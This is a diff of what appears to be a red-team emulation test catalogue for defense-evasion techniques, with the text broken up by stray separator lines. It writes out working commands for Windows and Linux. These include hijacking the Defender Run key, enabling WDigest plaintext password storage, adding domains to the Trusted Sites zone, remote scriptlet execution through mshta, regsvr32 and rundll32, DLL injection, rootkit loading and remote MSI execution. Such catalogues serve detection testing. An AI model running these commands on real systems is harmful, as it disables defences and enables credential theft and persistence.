|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
|
|
|
|
|
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -9926,96 +10008,39 @@ defense-evasion:
|
|
|
|
|
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
|
|
|
|
|
/t REG_DWORD /v HideFileExt /d 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
|
|
|
|
|
/v HideFileExt /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Modify Registry of Local Machine - cmd
|
|
|
|
|
description: |
|
|
|
|
|
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
|
|
|
|
CMD is ran as Administrative rights.
|
|
|
|
|
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
|
|
|
|
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
new_executable:
|
|
|
|
|
description: New executable to run on startup instead of Windows Defender
|
|
|
|
|
type: string
|
|
|
|
|
default: calc.exe
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
|
|
|
|
|
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
/v SecurityHealth /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Modify Registry of Another User Profile
|
|
|
|
|
description: 'Modify a registry key of each user profile not currently loaded
|
|
|
|
|
on the machine using both powershell and cmd line tools.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
|
|
|
|
|
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
|
|
|
|
|
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
|
|
|
|
|
|
|
|
|
|
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
|
|
|
|
|
# Get Username, SID, and location of ntuser.dat for all users
|
|
|
|
|
|
|
|
|
|
$ProfileList = @()
|
|
|
|
|
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
|
|
|
|
|
Select @{ name = "SID"; expression = { $_.PSChildName } },
|
|
|
|
|
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
|
|
|
|
|
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
|
|
|
|
|
|
|
|
|
|
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
|
|
|
|
|
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
|
|
|
|
|
|
|
|
|
|
$SIDObject = @()
|
|
|
|
|
|
|
|
|
|
foreach ($item in $LoadedHives)
|
|
|
|
|
{
|
|
|
|
|
$props = @{
|
|
|
|
|
SID = $item.SID
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
|
|
|
|
|
$SIDObject += $TempSIDObject
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
|
|
|
|
|
# if the count is less than 2 it doesn't work. :)
|
|
|
|
|
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
|
|
|
|
|
{
|
|
|
|
|
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
|
|
|
|
|
{
|
|
|
|
|
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
|
|
|
|
|
{
|
|
|
|
|
$UnloadedHives += $ProfileList[$p].SID
|
|
|
|
|
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
|
|
|
|
|
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
|
|
|
|
|
|
|
|
|
|
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
|
|
|
|
|
#####################################################################
|
|
|
|
|
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
Write-Verbose 'Unloading Registry hives for all users'
|
|
|
|
|
# Unload ntuser.dat
|
|
|
|
|
### Garbage collection and closing of ntuser.dat ###
|
|
|
|
|
[gc]::Collect()
|
|
|
|
|
reg unload "HKU\$($ProfileList[$p].SID)"
|
|
|
|
|
'
|
|
|
|
|
- name: Modify registry to store logon credentials
|
|
|
|
|
description: 'Sets registry key that will tell windows to store plaintext passwords
|
|
|
|
|
(making the system vulnerable to clear text / cleartext password dumping)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
|
|
|
|
|
Upon execution, the message "The operation completed successfully." will be displayed.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -10024,68 +10049,42 @@ defense-evasion:
|
|
|
|
|
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
|
|
|
|
|
/v UseLogonCredential /t REG_DWORD /d 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
|
|
|
|
|
/v UseLogonCredential /t REG_DWORD /d 0 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Modify registry to store PowerShell code
|
|
|
|
|
description: 'Sets Windows Registry key containing base64-encoded PowerShell
|
|
|
|
|
code.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
powershell_command:
|
|
|
|
|
description: PowerShell command to encode
|
|
|
|
|
type: String
|
|
|
|
|
default: Write-Host "Hey, Atomic!"
|
|
|
|
|
registry_key_storage:
|
|
|
|
|
description: Windows Registry Key to store code
|
|
|
|
|
type: String
|
|
|
|
|
default: HKCU:Software\Microsoft\Windows\CurrentVersion
|
|
|
|
|
registry_entry_storage:
|
|
|
|
|
description: Windows Registry entry to store code under key
|
|
|
|
|
type: String
|
|
|
|
|
default: Debug
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
$OriginalCommand = '#{powershell_command}'
|
|
|
|
|
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
|
|
|
|
|
$EncodedCommand =[Convert]::ToBase64String($Bytes)
|
|
|
|
|
$EncodedCommand
|
|
|
|
|
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
|
|
|
|
|
-Name #{registry_entry_storage} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Add domain to Trusted sites Zone
|
|
|
|
|
description: |
|
|
|
|
|
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
|
|
|
|
|
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
|
|
|
|
|
Upon execution, details of the new registry entries will be displayed.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
|
|
|
|
|
|
|
|
|
|
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
bad_domain:
|
|
|
|
|
description: Domain to add to trusted site zone
|
|
|
|
|
type: String
|
|
|
|
|
default: bad-domain.com
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
|
|
|
|
|
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
|
|
|
|
|
$name ="bad-subdomain"
|
|
|
|
|
new-item $key -Name $name -Force
|
|
|
|
|
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
|
|
|
|
|
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
|
|
|
|
|
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
|
|
|
|
|
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
|
|
|
|
|
Remove-item $key -Recurse -ErrorAction Ignore
|
|
|
|
|
- name: Javascript in registry
|
|
|
|
|
description: 'Upon execution, a javascript block will be placed in the registry
|
|
|
|
|
for persistence
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, a javascript block will be placed in the registry for persistence.
|
|
|
|
|
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -10094,11 +10093,11 @@ defense-evasion:
|
|
|
|
|
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
|
|
|
|
|
Settings" -Name T1112 -Value "<script>"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
|
|
|
|
|
Settings" -Name T1112 -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1170:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10203,7 +10202,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta calls a local VBScript file to launch notepad.exe
|
|
|
|
|
description: Tests execution of a local program by a VBScript file called by
|
|
|
|
|
Mshta
|
|
|
|
@@ -10218,7 +10217,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta executes VBScript to execute malicious command
|
|
|
|
|
description: |
|
|
|
|
|
Run a local VB script to run local user enumeration powershell command
|
|
|
|
@@ -10231,7 +10230,7 @@ defense-evasion:
|
|
|
|
|
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
|
|
|
|
|
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta Executes Remote HTML Application (HTA)
|
|
|
|
|
description: |
|
|
|
|
|
Execute an arbitrary remote HTA.
|
|
|
|
@@ -10255,7 +10254,7 @@ defense-evasion:
|
|
|
|
|
mshta "#{temp_file}"
|
|
|
|
|
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1096:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10396,7 +10395,7 @@ defense-evasion:
|
|
|
|
|
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
|
|
|
|
|
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1126:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10452,7 +10451,7 @@ defense-evasion:
|
|
|
|
|
- name: Add Network Share
|
|
|
|
|
description: 'Add a Network Share utilizing the command_prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10469,7 +10468,7 @@ defense-evasion:
|
|
|
|
|
- name: Remove Network Share
|
|
|
|
|
description: 'Removes a Network Share utilizing the command_prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10482,11 +10481,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net share #{share_name} /delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remove Network Share PowerShell
|
|
|
|
|
description: 'Removes a Network Share utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -10680,7 +10679,7 @@ defense-evasion:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
|
|
|
|
|
-Name #{registry_entry_storage}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1502:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -10859,7 +10858,7 @@ defense-evasion:
|
|
|
|
|
- name: Plist Modification
|
|
|
|
|
description: 'Modify MacOS plist file in one of two directories
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -11157,7 +11156,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shared Library Injection via LD_PRELOAD
|
|
|
|
|
description: |
|
|
|
|
|
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
|
|
|
@@ -11175,7 +11174,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'LD_PRELOAD=#{path_to_shared_library} ls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Process Injection via C#
|
|
|
|
|
description: |
|
|
|
|
|
Process Injection using C#
|
|
|
|
@@ -11273,9 +11272,10 @@ defense-evasion:
|
|
|
|
|
identifier: T1121
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regasm Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
|
|
|
|
|
execution, "I shouldn''t really execute either." will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11303,12 +11303,11 @@ defense-evasion:
|
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvs Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
|
|
|
|
|
SNK
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
|
|
|
|
|
along with other information about the assembly being installed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11414,9 +11413,9 @@ defense-evasion:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11436,12 +11435,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
|
|
|
|
|
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11454,12 +11452,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 local DLL execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11481,7 +11479,7 @@ defense-evasion:
|
|
|
|
|
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
|
|
|
|
|
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1014:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -11552,7 +11550,7 @@ defense-evasion:
|
|
|
|
|
- name: Loadable Kernel Module based Rootkit
|
|
|
|
|
description: 'Loadable Kernel Module based Rootkit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11564,11 +11562,11 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo insmod #{rootkit_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Loadable Kernel Module based Rootkit
|
|
|
|
|
description: 'Loadable Kernel Module based Rootkit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11580,7 +11578,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo modprobe #{rootkit_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows Signed Driver Rootkit Test
|
|
|
|
|
description: |
|
|
|
|
|
This test exploits a signed driver to execute code in Kernel.
|
|
|
|
@@ -11602,7 +11600,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'puppetstrings #{driver_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1085:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -11663,9 +11661,10 @@ defense-evasion:
|
|
|
|
|
identifier: T1085
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe. Upon execution
|
|
|
|
|
notepad.exe will be opened.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11678,7 +11677,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 execute VBscript command
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
|
|
@@ -11696,7 +11695,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 advpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with advpack.dll.
|
|
|
|
@@ -11721,7 +11720,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 ieadvpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with ieadvpack.dll.
|
|
|
|
@@ -11746,7 +11745,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 syssetup.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with syssetup.dll.
|
|
|
|
@@ -11772,7 +11771,7 @@ defense-evasion:
|
|
|
|
|
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
|
|
|
|
|
128 .\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 setupapi.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with setupapi.dll.
|
|
|
|
@@ -11798,7 +11797,7 @@ defense-evasion:
|
|
|
|
|
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
|
|
|
|
|
.\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1064:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -11867,7 +11866,7 @@ defense-evasion:
|
|
|
|
|
- name: Create and Execute Bash Shell Script
|
|
|
|
|
description: 'Creates and executes a simple bash script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -11882,7 +11881,7 @@ defense-evasion:
|
|
|
|
|
- name: Create and Execute Batch Script
|
|
|
|
|
description: 'Creates and executes a simple batch script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -11902,7 +11901,7 @@ defense-evasion:
|
|
|
|
|
\n"
|
|
|
|
|
cleanup_command: 'del #{script_to_create} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1218:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -12016,7 +12015,7 @@ defense-evasion:
|
|
|
|
|
description: 'Injects arbitrary DLL into running process specified by process
|
|
|
|
|
ID. Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12040,12 +12039,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
|
|
|
|
|
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
|
|
|
|
|
Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12057,12 +12056,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Register-CimProvider - Execute evil dll
|
|
|
|
|
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
|
|
|
|
|
note this dll can be served up via SMB
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12081,12 +12080,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Local MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
|
|
|
|
The MSI opens notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12103,13 +12102,13 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Remote MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
|
|
|
|
in application installation, commonly seen in malware execution. The MSI opens
|
|
|
|
|
notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -12121,7 +12120,7 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Arbitrary DLL
|
|
|
|
|
description: |
|
|
|
|
